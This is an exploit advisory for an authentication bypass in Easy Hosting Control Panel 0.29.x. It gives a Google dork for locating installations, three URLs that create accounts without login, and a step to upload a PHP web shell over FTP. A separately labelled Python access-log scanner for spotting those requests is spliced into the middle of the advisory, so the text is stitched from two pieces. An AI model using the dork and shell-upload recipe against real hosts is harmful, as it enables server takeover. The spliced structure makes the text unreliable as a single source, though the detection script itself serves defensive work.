# Exploit Title: Easy Hosting Control Panel Admin Auth Bypass
# Google Dork: inurl:/ehcp/?op=applyfordomainaccount
# Date: 10/04/2011
# Author: Jasman
# Software Link: https://launchpad.net/ehcp & http://www.ehcp.net
# Version: 0.29.10 - 0.29.13
# Tested on: Ubuntu, Debian

+ Description
Easy Hosting Control Panel is designed for hosting multiple domains on a single machine.
It uses LAMP (Linux, Apache, MySQL, PHP). Its aims: easy to install, easy to use, non-complex, functional.

+ Vulnerable:
Adding an FTP account and a domain does not require a login.

http://site.com/vhosts/ehcp/?op=applyforaccount
http://site.com/vhosts/ehcp/?op=applyforftpaccount
http://site.com/vhosts/ehcp/?op=applyfordomainaccount

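An added example, not part of the original advisory: a Python check that scans web-server access-log lines for requests to the three operations listed above, so an administrator can see which clients reached the self-registration forms. The log format (Apache combined), the sample lines and the function name are assumptions made for this example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# The three operations the advisory lists as reachable without a login.
UNAUTH_OPS = {"applyforaccount", "applyforftpaccount", "applyfordomainaccount"}

# Assumed format: Apache common/combined log (client, timestamp, request, status).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})\b'
)

def find_signup_requests(lines):
    """Return {client: [(timestamp, op, status), ...]} for EHCP self-signup hits."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        url = urlsplit(m["target"])
        if "/ehcp" not in url.path.lower():
            continue  # only the panel's own path is of interest
        # parse_qs percent-decodes values, so op=%61pplyfor... is caught too.
        # Lower-casing is a conservative choice for matching, not EHCP behaviour.
        for op in parse_qs(url.query).get("op", []):
            if op.lower() in UNAUTH_OPS:
                hits[m["client"]].append((m["ts"], op.lower(), int(m["status"])))
    return dict(hits)

# Constructed sample lines using documentation addresses; not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Apr/2011:09:14:02 +0000] "GET /vhosts/ehcp/?op=applyforftpaccount HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Apr/2011:09:14:40 +0000] "POST /vhosts/ehcp/?op=%61pplyfordomainaccount HTTP/1.1" 200 4301 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [10/Apr/2011:09:20:11 +0000] "GET /vhosts/ehcp/?op=constructed_other_op HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [10/Apr/2011:09:21:00 +0000] "GET /index.php?op=applyforaccount HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, events in find_signup_requests(SAMPLE_LOG).items():
        for ts, op, status in events:
            print(f"{client} {ts} op={op} status={status}")
```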
+ Exploit
Upload a shell via FTP
http://site.com/vhosts/[username]/[domain]/httpdocs/shell.php

+ Tested On
0.29.13
0.29.11
0.29.10

+ Other Link:
https://bugs.launchpad.net/ehcp/+bug/865889

+ Thanks to:
ArRay,`yuda, N4ck0, K4pt3N, samu1241, bejamz, Gameover, antitos, yuki, pokeng,
aphe_aphe, jos_ali_joe, BlueBoyz, JFry_, Ihsana'Lab, Anaski Crew, Forum.ExploreCrew,
Exploit-Id, FeeLcoMz All Indonesian Hacker